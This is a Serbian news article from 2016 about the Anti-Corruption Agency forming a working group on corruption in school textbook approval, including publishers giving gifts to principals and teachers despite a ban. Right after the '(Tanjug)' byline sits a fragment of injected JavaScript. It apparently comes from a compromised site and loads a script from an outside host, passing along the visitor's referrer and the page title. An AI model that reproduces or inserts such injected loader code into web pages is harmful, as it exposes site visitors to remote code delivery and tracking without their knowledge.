Društvo
15.04.2016. 07:46
ekspres

Babić: Veliki rizik od korupcije i pri izboru udžbenika

Ekspres.net
Izvor: Ekspres.net

Agencija se već duže vreme bavi korupcijom u prosveti, posebno postupcima odobravanja udžbenika i još 2012. godine utvrđeni su određeni rizici korupcije, kaže direktorka Agencije za borbu protiv korupcije Tatjana Babić

BEOGRAD, 15. aprila - Direktorka Agencije za borbu protiv korupcije Tatjana Babić najavila je danas da će biti formirana radna grupa ekspertska koja će analizirati da li se primenjuje Zakon u postupcima izbora udžbenika, jer je primećeno da tu i dalje ima najviše rizika od korupcije.

Ona je naglasila da će radna grupa analizirati implementaciju Zakona o udžbenicima, definisati slabe tačke i rizike korupcije pri izboru udžbenika i predložiti rešenja koja će biti primenjiva kod nas.

"U kasnijim fazama po potrebi u rad radne grupe biće uključeni i policija i tužilaštvo", rekla je Babić na RTS-u.

Za Agenciju je, kako kaže, ovaj problem od prvorazrednog nacionalnog značaja, jer se radi se o deci najnižeg uzrasta i tu je najveća trka izdavača.

Babić kaže da se Agencija već duže vreme bavi korupcijom u prosveti posebno postupcima odobravanja udžbenika i da su još 2012. godine utvrdili određene rizike korupcije i dali preoporuke za uklanjanje tih rizika.

U izradi novog Zakona o udžbenicima Agencija je aktivno učestvovala i usvojene su određene preporuke, a jedna od preporuka prema rečima direktorke je i zabrana izdavačima udžbemnika da daju poklone direktorima, nastavnicima, kao podsticaj da izaberu udžbenike tog izdavača.

"Pokazalo se da se ta jasna zakonska zabrana potpuno ignoriše. Oni pronalaze kreativne načine da tu odredbe ne opoštuje. Novi Zakon o udžbenicima donet je da se poveća dostupnost i kvalitet udžbenika, a danas vidimo da su udžbenici skuplji, a sve upitnijeg kvaliteta", zaključila je Babić.

(Tanjug)s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
14°C
23.02.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve